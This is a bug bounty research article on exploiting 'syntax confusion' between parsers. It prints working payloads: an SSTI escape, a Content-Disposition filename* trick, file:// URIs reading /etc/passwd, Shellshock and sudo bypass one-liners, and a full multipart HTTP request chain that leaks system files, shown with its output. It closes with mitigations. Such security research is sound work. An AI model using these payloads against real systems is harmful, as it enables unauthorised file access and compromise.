Writeup by Alex Brumen aka Brumens, researcher enablement analyst, YesWeHack
In this article, you will discover unique, advanced techniques for exploiting confusion across various programming languages arising from differing syntaxes, which I will refer to as ‘syntax confusion’.
I’ll provide step-by-step guidance, supported by with practical examples, on crafting payloads to confuse syntaxes and parsers – enabling filter bypasses and real-world exploitation.
Developers often assume there is only one valid syntax for a given input, without considering that identical data can be represented in different syntax variations with the same outcome. For instance, a file upload request can use multipart form data with a standard filename parameter, but the parameter can also be defined in extended syntax as filename*=UTF-8''.
Whether you’re a pentester, security researcher or Bug Bounty hunter, this guide offers actionable advice on transforming theoretical payloads into effective techniques that uncover unexpected vulnerabilities.
You can also explore these methods by watching my presentation of this research at NahamCon 2025 (free signup required).
What Is syntax confusion? Ambiguous parsing explained
Syntax confusion occurs when two or more components in a system interpret the same input differently due to ambiguous or inconsistent syntax rules. The disagreement can occur between browsers, proxies, web servers, frameworks, libraries or even different functions within the same execution stack. Attackers craft inputs that exploit these mismatches to bypass filters, alter control flow, or surface unexpected behaviours such as cache poisoning, SSRF escalation or injection.
Modern web applications often involve a chain of parsers: a browser normalises input, a CDN may rewrite it, a proxy forwards, the application framework parses it, and helper libraries interpret it again. If any two stages disagree on what the input ‘means’ semantically, validation applied at one stage may no longer hold in another – creating a consistent path from ‘sanitised’ input to exploitable behaviour.
From idea to goal: How my syntax confusion research took shape
The research objective was to identify syntaxes used by different technologies that are not widely known but can be abused to leverage novel attacks against web applications. I planned to weaponise these syntaxes to craft payloads that can bypass filters and exploit syntax confusion vulnerabilities.
This research project really kicked off on a late Friday evening, fuelled by late-night documentation dives. That's when I stumbled upon C Trigraphs and Digraphs – character sequences such as ??= that compilers silently translate into #. For instance:
1// %: == #2%:include <stdio.h>34int main() <% // <% == {5 printf("Digraphs!\n")6 return 0;7%> // <% == }
This syntax really grabbed my attention. It was a stark reminder that radically different syntaxes can produce the exact same result.
That realisation became the driving force behind this research project. What if I could identify obscure corners of web technologies where different syntax interpretations collide? It wasn't just about finding quirky syntax; it was about turning that confusion into a tangible advantage for security testing.
The ultimate goal? To weaponise syntax confusion and create practical payloads that could bypass security filters and expose hidden vulnerabilities. This meant diving deep into specifications, experimenting with different encodings, and trying to make systems interpret the same data in conflicting ways.
YOU MIGHT ALSO LIKE The ultimate guide to Bug Bounty reconnaissance and footprinting
Quick detection checklist for syntax confusion
Apply these steps to detect parser disagreements early and turn them into practical exploits:
- Generate semantically equivalent variants: such as
getParamvsgetParam[],:443vs:000443 - Observe normalisation at each hop: browser, CDN, proxy, application framework, library
- Intentionally trigger error paths (overlong ports, broken quoting) and note behaviour
- Capture evidence: analyse raw requests and responses, and look for differences to detect unexpected behaviours
Detecting syntax confusion gadgets: headers, URLs, URIs, unicode
Web application functionalities that support multiple syntaxes and interact with other components are particularly likely to suffer from syntax confusion.
When hunting for gadgets, look for functions or endpoints that:
- Support various input syntaxes that map to the same semantic value
- Pass user-controlled syntax through multiple nodes in a workflow, where at least two nodes process the same or overlapping parts differently
Python & Perl: named unicode escapes – When \N{…} causes syntax confusion
As with most programming languages, Python and Perl support hex (\x41), octal (\101) and unicode (\u0041) escapes. Usefully, Python and Perl also provide a named-character escape in the form of \N{...}, which allows you to render a character from its Unicode name.
Related Python documentation:
You’ll find something similar in the Perl documentation:
In an attack scenario, if you can control a string but certain characters (for example, the dollar sign) are blocked, you can use these escapes to render the characters you need. This makes it possible to craft more advanced payloads – for instance server-side template injection (SSTI) payloads such as:
1\N{DOLLAR SIGN}{7*7} => ${7*7}
For novel ways to exploit SSTI and achieve remote code execution (RCE), read my previous research entitled: Limitations are just an illusion – advanced server-side template exploitation with RCE everywhere.
TRY THIS TECHNIQUE YOURSELF: Take on the ‘Chatroom’ CTF challenge on Dojo
Content-Disposition filename vs filename*: RFC 6266/8187 parsing differences
The Content-Disposition header can suggest filenames for uploaded or downloaded files using the filename parameter. In its simplest form you might see:
1Content-Disposition: form-data; name="anyBodyParam"; filename="myfile.txt"
There is, however, an alternate syntax using an asterisk (*) that supports charsets and percent-encoding. For example:
1Content-Disposition: form-data; name="anyBodyParam"; filename*=UTF8''myfile%0a.txt
That encoded form allows arbitrary bytes via percent-encoding, such as a URL-encoded and newline that can be placed into the suggested filename.
The tricky part is how different parsers treat filename and filename*. Some implementations treat filename* as a separate parameter and ignore it when looking only for filename, while others honour filename* and decode its value.
Attackers can exploit that inconsistency: a system that validates only filename may miss malicious content hidden in filename*, allowing bypasses of filename restrictions, injection of control characters or delivery of unexpected file names. By abusing this syntax confusion, you may be able to overwrite files and achieve code injection.
Exploiting the File URI Scheme file://host:port/path (RFC 8089)
The file URI scheme can identify files stored on a host computer. For many years, I have simply overlooked the file URI and just accepted that the syntax must be file:///<pathToFile> – without realising that the correct format is:
1file://<host>/<path>
This means you can use the file URI scheme with a host, so you can request the file in the following formats:
1file://127.0.0.1/<pathToFile>
Or:
1file://spoofed.xxxx.oastify.com/<pathToFile>
You can try this yourself using the Python code snippet below:
1from urllib.request import urlopen23content = urlopen(4 "file://127.0.0.1/etc/passwd", timeout=2,5 ).read().decode('utf-8')67print(content)
Using the file URI scheme with an included host, an attacker may be able to bypass filters or receive DNS pingbacks to fingerprint the code workflow in the target application.
Syntax confusion in the wild: CVEs exploited via ambiguous parsing
Although this research focuses on web applications, the vulnerabilities below illustrate the broader concept of syntax confusion across different layers of software. These CVEs show that syntax confusion vulnerabilities can be exploited with deceptively simple payloads. In each case, just a few carefully placed characters are enough to trigger a security flaw.
Shellshock, an 11-year old bug catalogued as CVE-2014-6271, revealed how Bash could be tricked into executing commands hidden inside what appeared to be harmless environment variables:
1env shellshock='() { :;}; echo vulnerable' bash -c "echo test"
CVE-2019-14287, meanwhile, demonstrated how unusual user ID syntax could bypass sudo restrictions. By introducing a hash symbol, attackers could escape the controls meant to limit privileges:
1sudo -u#-1 id
More recently, CVE-2023-24329 in Python3's urllib.parse showed how even a simple space at the start of a URL could be exploited to trigger a server-side request forgery vulnerability:
1[SPACE]http://127.0.0.1/ssrf
These CVEs illustrate how carefully crafted input can exploit vulnerabilities through subtle syntax confusion. In each case, the input bypassed checks in the code, revealing how software can stumble when it encounters unexpected patterns. Even a small deviation from what the program anticipates can open the door to exploitation.
Syntax confusion in the wild: My Bug Bounty finds
My research led me to discover two critical vulnerabilities at different companies: a cache poisoning bug where I abused the parse_url function in PHP and – my best Bug Bounty find to date – escalating a limited SSRF with blind arbitrary file read into full arbitrary file access on the target system.
Bug Bounty case study #1: PHP parse_url port normalisation – from cache poisoning to stored XSS
The PHP function parse_url parsers a URL and returns an associative array containing its various components. However, parse_url exhibits an interesting behaviour when the port number contains leading zeros.
Most browsers and parsers handle URLs like http://example.com:000443 by simply removing the leading zeros, resulting in http://example.com:443. PHP’s parse_url behaves similarly for short port numbers but behaves differently when the port length exceeds five digits. It will remove the leading zeros for http://example.com:00443 but keep the zeros and throw an error when it receives http://example.com:000443.
I discovered this behaviour when trying to exploit a web application vulnerable to cache poisoning. I could only poison the URL port while the hostname in the response was otherwise fixed.
I noticed that when sending specific ports, such as 80 and 443, the application removed the port section. When I supplied an invalid/oversized port number (such as 123456), the application reflected my hostname inside a script tag – showing that I could control the reflected hostname only when parse_url() failed to parse the port.
ALSO IN THIS SERIES The ultimate Bug Bounty guide to exploiting race condition vulnerabilities in web applications
Conversely, sending http://example.com:000123 was normalised to http://example.com:123 without reflecting my hostname.
To exploit this reliably I needed to force the server-side parsing to treat the port as invalid before any normalisation, and for the client/browser to accept the final, normalised host:port.
I therefore modified the host and come up with the payload http://example.com:000123:443.
The server’s normalisation removed the trailing :443, leaving http://example.com:000123, which triggered an error in parse_url() the application then rendered my custom hostname. The browser ultimately normalised the URL to http://example.com:123. Using this knowledge, I was able to perform a successful cache poisoning leading to stored XSS on the site’s root page.
Analysing the workflow above, it appears the underlying code attempted parse_url first and, if parsing succeeded and the host matched the site, it would reflect the hostname (safe_host). However, if it failed, it would render and normalise the supplied hostname from a vulnerable template block (eg vuln.twig) that contained the invalid port.
Bug Bounty case study #2: From limited SSRF and blind file read to complete arbitrary file access
This vulnerability, which took around three months in total, ultimately allowed me to retrieve all system files from the target. Although I cannot name the target, I can say that it’s a well-known company globally.
The vulnerability was discovered in a REST API server that exposed a test endpoint.
The endpoint accepted a method name via the URL path, such as http://redacted.com/api/getusers where getusers is the user-supplied method. Users could also add custom body parameters to the HTTP request. Responses were returned in JSON.
While investigating, I found a file in another endpoint that leaked PHP code used by the test endpoint. The leaked code showed that the server used PHP cURL to perform internal requests. Moreover, if a body parameter started with the character @, it would try to fetch a file from the system – provided the path started with /tmp/.
Putting all the pieces together, I manage to exploit this vulnerability by crafting a payload as a custom body parameter, such as:
1anyBodyParam=@/tmp/../etc/passwd
Looks simple, right? Well, not exactly. I can confirm that the SSRF and file read work because they time out if the file doesn’t exist, but an existing file remains in the HTTP request sent by the internal code. The HTTP request sends a multipart/form-data POST data containing the file content, but only the HTTP response is outputted.
If the file content had been application/x-www-form-urlencoded I could look for an endpoint that reflects a POST parameter's value since I could control the parameter name.
However, if sent as multipart/form-data containing the filename parameter, my custom parameter anyBodyParam is not added to PHP’s $_POST variable. Instead, anyBodyParam is added to the variable $_FILES, which isn’t usually reflected in the HTTP response unless it specifically handles file-handling functionalities.
At this point I realised I needed to find a way to include my custom parameter and the file content in $_POST. Fortunately, I discovered a syntax confusion – the triggered SSRF contained the Content-Disposition HTTP header and the file content:
1Content-Disposition: form-data; name="anyBodyParam"; filename="/tmp/../etc/passwd"2Content-Type: application/octet-stream34root:x:0:0:root:/root:/bin/bash5daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin6…
If the parameter name contains a double quote (such as anyBodyParam"), it would break the quotations and leave "; filename="/tmp/../etc/passwd" as invalid data, while name="anyBodyParam" remains valid. Harnessing this knowledge, I could take advantage of the administrator login endpoint that reflected the value of the body parameter username.
1username"=@/tmp/../etc/passwd
We can then chain all these vulnerabilities to access the system files:
1POST /test/ HTTP/1.12Host: redacted.com3Content-Length: 3694Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt3z368MiAdYdPXnT567------WebKitFormBoundaryt3z368MiAdYdPXnT8Content-Disposition: form-data; name="method"910../admin/login11------WebKitFormBoundaryt3z368MiAdYdPXnT12Content-Disposition: form-data; name="parameters"1314username"=@/tmp/../etc/passwd15------WebKitFormBoundaryt3z368MiAdYdPXnT--
The SSRF that I triggered then performs an internal HTTP request containing the following HTTP POST request:
1POST /admin/login HTTP/1.12Host: localhost3Content-Length: 4594Content-Type: multipart/form-data; boundary=------------------------1cc09e27c2bc42bd56--------------------------1cc09e27c2bc42bd7Content-Disposition: form-data; name="username""; filename="/tmp/../etc/passwd"8Content-Type: application/octet-stream910root:x:0:0:root:/root:/bin/bash11daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin12…13--------------------------1cc09e27c2bc42bd
Finally, the response contains the HTTP response from the admin login endpoint with the username body parameter reflecting the contents of /etc/passwd:
1<title>Admin login</title>2<!-- code... -->3<form action="action_page.php" method="post">4 <label for="username"><b>Username</b></label>5 <input type="text" name="username" placeholder="Enter Username..." value="root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin …" required>67 <label for="password"><b>Password</b></label>8 <input type="password" name="password" placeholder="Enter Password..." required>910 <button type="submit">Login</button>11</form>12<!-- code... -->13
This was a complex chain of vulnerabilities requiring significant background knowledge to understand the underlying workflow. The syntax confusion in Content-Disposition provided the last piece of the puzzle: allowing me to bypass the $_FILES variable restriction and inject file contents directly into reflected $_POST parameters.
Mitigation best practices for syntax confusion: protecting applications from ambiguous parsing
Developers and security professionals should consider the following defensive measures to reduce the risks introduced by syntax confusion vulnerabilities.
Consistent parsing strategy
The most effective defence is to minimise ambiguity by using, whenever possible, a single, consistent parser for handling input. If multiple parsers are unavoidable, document their behaviour carefully and apply strict validation rules to ensure that the same data cannot be interpreted in conflicting ways.
Input validation and whitelisting
Define what valid input should look like and reject anything outside of that scope. Whitelisting is generally more reliable than attempting to blacklist known bad patterns. Consistently encoding data before processing also helps to prevent discrepancies in how characters, escape sequences or delimiters are interpreted across systems.
Safe error handling
Applications should avoid exposing detailed parser errors to end users. Such messages can reveal which component is being used or the exact parsing rule that failed, providing useful guidance to attackers. Instead, log the necessary detail for developers internally, while keeping user-facing messages generic.
Regular security testing
Proactive testing with ambiguous and edge-case inputs is essential. By simulating the kind of tricks attackers might use – such as mixed encodings or nested delimiters – security teams can spot parsing inconsistencies before they are exploited in the wild. Making this a regular practice builds resilience over time.
Research roadmap for syntax confusion
Syntax confusion vulnerabilities continue to surface as different parsers and interpreters clash over how to interpret the same input. Problematic syntax combinations are still being discovered, and attackers can leverage these ambiguities to achieve unexpected and severe impacts.
Complex interactions between syntaxes within payloads offer valuable opportunities for security researchers and Bug Bounty hunters to uncover novel exploitation paths. As modern applications increasingly process user input through multiple parsers across complex workflows, new variants will continue to emerge – making ongoing research and testing essential to stay ahead of evolving threats.
HANDS-ON HACKING TRAINING Tackle labs and CTF challenges around common vulnerabilities on DOJO, our CTF training platform for bug hunters
References & further reading
- Watch me present this research – ‘The minefield between syntaxes: exploiting syntax confusions in the wild’ – at Nahamcon 2025 (free signup required)
- ‘Exploiting Unknown syntaxes’ training modules on Dojo, our CTF playground and Bug Bounty training platform
- ‘Coffee Shop’ CTF challenge on Dojo, our CTF playground and Bug Bounty training platform
- Unveiling vulnerabilities in HTTP parsers: exploiting inconsistencies for security breaches – by Rafael da Costa Santos